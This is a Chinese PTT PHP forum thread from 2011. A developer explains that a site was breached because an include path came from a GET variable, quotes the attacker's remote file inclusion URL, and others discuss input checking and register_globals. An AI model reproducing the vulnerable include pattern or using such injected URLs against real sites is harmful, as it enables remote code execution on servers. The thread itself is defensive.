PTT數位生活區 / PHP

Re: [請益] 網路攻擊?

看板PHP作者 (九月二號)時間14年前 (2011/07/05 21:40), 編輯推噓2(2019)
留言21則, 8人參與, 最新討論串2/2 (看更多)
已經找到了漏洞了,所以上來報告一下 我程式中有一行 require $PATH.'config.php'; 這個$PATH是和一個GET變數有關,所以被人把$PATH設成了 "http://www.XXX.XX/webcam/pesquisadorRFI.txt?" 整行就變成了 require(http://www.XXX.XX/webcam/pesquisadorRFI.txt?/config.php) 另外提醒大家 PHP.INI中的allow_url_fopen 最好是設成OFF(預設ON) 可以避免以上的問題發生 -- 愛情真奇妙,可以讓二個陌生的人變的如此親密 婚姻更奇妙,可以讓二個親密的人變的如此陌生 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 218.167.184.34
07/05 23:16, , 1F
我比較想知道為什麼你的GET會被竄改? source code被改?
07/05 23:16, 1F
07/05 23:18, , 2F
還是你完全沒有過濾就直接把GET就用上去了?
07/05 23:18, 2F
07/06 00:26, , 3F
比起關allow_url_fopen 對使用端的所有輸入進行檢查才
07/06 00:26, 3F
07/06 00:26, , 4F
是正道
07/06 00:26, 4F
07/06 00:27, , 5F
我的辦法是在所有網頁開頭放置檢查函數 詳細定義這個
07/06 00:27, 5F
07/06 00:28, , 6F
網頁有哪些POST或GET變數 變數是數字or字串 and長度等
07/06 00:28, 6F
07/06 00:32, , 7F
變數污染的問題遠比allow_url_fopen還重要多了..
07/06 00:32, 7F
07/06 01:12, , 8F
應該是把register_globals關掉才對
07/06 01:12, 8F
07/06 09:37, , 9F
register_globals不是控制要不要把$_REQUEST裡面的東東
07/06 09:37, 9F
07/06 09:38, , 10F
註冊成全域變數嗎 他應該沒有直接這樣使用吧
07/06 09:38, 10F
07/06 13:14, , 11F
$_GET 也是 $_REQUEST 裡的東西啊...
07/06 13:14, 11F
07/06 13:15, , 12F
所以這裡就是那個人用 ?PATH=xxxx 去給它設值而已
07/06 13:15, 12F
07/06 13:17, , 13F
我也覺得應該要關 register_globals
07/06 13:17, 13F
07/06 14:41, , 14F
他如果用$PATH=$_GET['path']那有沒有關都一樣啦
07/06 14:41, 14F
07/06 17:48, , 15F
也是 所以還是自己程式寫作的習慣問題...
07/06 17:48, 15F
07/07 12:09, , 16F
是的,是我寫程式的習慣不好...
07/07 12:09, 16F
07/10 08:36, , 17F
不管習慣好不好,官方register_global建議要關掉,有安全問題
07/10 08:36, 17F
07/10 08:38, , 18F
07/10 08:38, 18F
07/11 17:43, , 19F
新的沒有人還開著了吧。
07/11 17:43, 19F
07/12 07:11, , 20F
告訴學員說register_global必須打開程式才能work..真實故事.
07/12 07:11, 20F
07/12 07:14, , 21F
這很難說,之前聽過一個故事,某職訓班PHP講師上課時演示程式,
07/12 07:14, 21F
更多 september02 的文章
文章代碼(AID): #1E4nGxzl (PHP)
討論串 (同標題文章)
完整討論串 (本文為第 2 之 2 篇):
排序: 最新先 | 最舊先 | 留言數
在新視窗開啟完整討論串 (共2篇)
PHP 近期熱門文章
更多 近期熱門文章 >>
PTT數位生活區 即時熱門文章
更多 即時熱門文章 >>
更多 september02 的文章
文章代碼(AID): #1E4nGxzl (PHP)